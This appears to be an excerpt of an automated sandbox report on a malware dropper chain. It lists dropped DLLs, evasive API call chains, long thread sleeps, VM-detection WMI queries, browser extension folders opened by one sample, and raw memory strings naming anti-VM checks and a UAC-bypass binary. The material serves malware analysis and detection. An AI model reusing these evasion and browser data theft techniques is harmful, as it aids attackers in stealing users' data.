Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FP4S7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RV73J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE3LC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KMJ34.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TIUE0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JRUFU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QLQ4O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-VFKEO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-6USPQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Windows\Panther\UnattendGC\lua51.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MVB0G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\is-5320E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ClocX\uninst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-01JPP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-338K7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9PQ68.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-9RJ1O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ClocX\ClocX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HPIH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-2N2OT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KGUCQ.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

API coverage: 7.6 %

Source: C:\Windows\explorer.exe TID: 7020	Thread sleep time: -124100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6240	Thread sleep time: -114200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4456	Thread sleep time: -43800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1228	Thread sleep time: -40600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe TID: 6448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe TID: 984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe TID: 6992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5000	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe TID: 7348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\617D.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7D14.exe TID: 600	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7D14.exe TID: 7684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9234.exe TID: 5812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9234.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A203.exe TID: 6044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A203.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe TID: 7984	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe TID: 7984	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\9234.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00402910 FindFirstFileW,	10_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_004068B4 FindFirstFileW,FindClose,	10_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	13_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_004068B4 FindFirstFileW,FindClose,	13_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00402910 FindFirstFileW,	13_2_00402910
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004065CA FindFirstFileA,FindClose,	22_2_004065CA
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	22_2_004059F9
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004027AF FindFirstFileA,	22_2_004027AF
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00474060 FindFirstFileA,FindNextFileA,FindClose,	24_2_00474060
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004520C0 FindFirstFileA,GetLastError,	24_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004966E4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	24_2_004966E4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004634F4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	24_2_004634F4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00463970 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	24_2_00463970
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00461F68 FindFirstFileA,FindNextFileA,FindClose,	24_2_00461F68

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Code function: 19_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

19_2_00409B30

Source: C:\Users\user\AppData\Local\Temp\907.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899ntdllRtlGetNtVersionNumbersNtWow64DebuggerCallKernel32GetTickCount64advapi32MD4InitMD4UpdateMD4FinalMD5InitMD5UpdateMD5FinalA_SHAInitA_SHAUpdateA_SHAFinalRtlRandomRtlRandomExRtlComputeCrc32ZwQuerySystemInformationNtQueryInformationProcessNtQueryInformationThreadNtCreateThreadExkernel32ShlWapiPathAppendWPathCanonicalizeWPathCompactPathWPathCompactPathExWPathCommonPrefixWPathFindOnPathWPathGetCharTypeWPathIsContentTypeWPathAddBackslashWPathMakePrettyWPathMatchSpecWPathMatchSpecExWPathParseIconLocationWPathQuoteSpacesWPathRelativePathToWPathRemoveArgsWPathRemoveBlanksWPathRemoveExtensionWPathRemoveFileSpecWPathRenameExtensionWPathSearchAndQualifyWPathSetDlgItemPathWPathUnquoteSpacesWPathRemoveBackslashWPathIsDirectoryWPathAddExtensionWPathIsFileSpecWPathFileExistsWPathCombineWPathFindExtensionW :%s%sSHDeleteEmptyKeyWSHDeleteKeyWSHDeleteValueWSHGetValueWSHSetValueWSHQueryValueExWSHEnumKeyExWSHEnumValueWSHQueryInfoKeyWSHOpenRegStreamWmailto:://%huhttpsWinInetInternetOpenWInternetConnectWHttpOpenRequestWInternetQueryOptionWInternetSetOptionWHttpSendRequestWHttpSendRequestExWHttpEndRequestWHttpQueryInfoWFindFirstUrlCacheEntryWFindFirstUrlCacheEntryExWFindNextUrlCacheEntryWFindNextUrlCacheEntryExWGetUrlCacheEntryInfoWDeleteUrlCacheEntryWInternetReadFileInternetCloseHandleFindCloseUrlCacheMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/POSTIpHlpApiGetAdaptersAddressesVmwareBluetoothLoopbackGetSystemFirmwareTableROOT\CIMV2SELECT * FROM Win32_DiskDriveModelvmwareCaptionWS2_32socketbindclosesocketgetsocknamesendsendtorecvrecvfromselectgethostbynameWSAGetLastErrorWSACloseEventWSACreateEventWSAEventSelectacceptconnectgetaddrinfoWSAStartupWSACleanupWSASetEventWSAResetEventlistenWSAWaitForMultipleEventsWSAEnumNetworkEventsWSAConnectWSASendWSASendDisconnectWSARecvWSARecvDisconnectWSARecvFromWSASendTogetpeernamentohsntohlgetsockoptsetsockoptWSAIoctlGetAddrInfoExWhtonshtonlinet_addrWSASocketW%s\%uurlsReferer: http://news.qq.com
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol 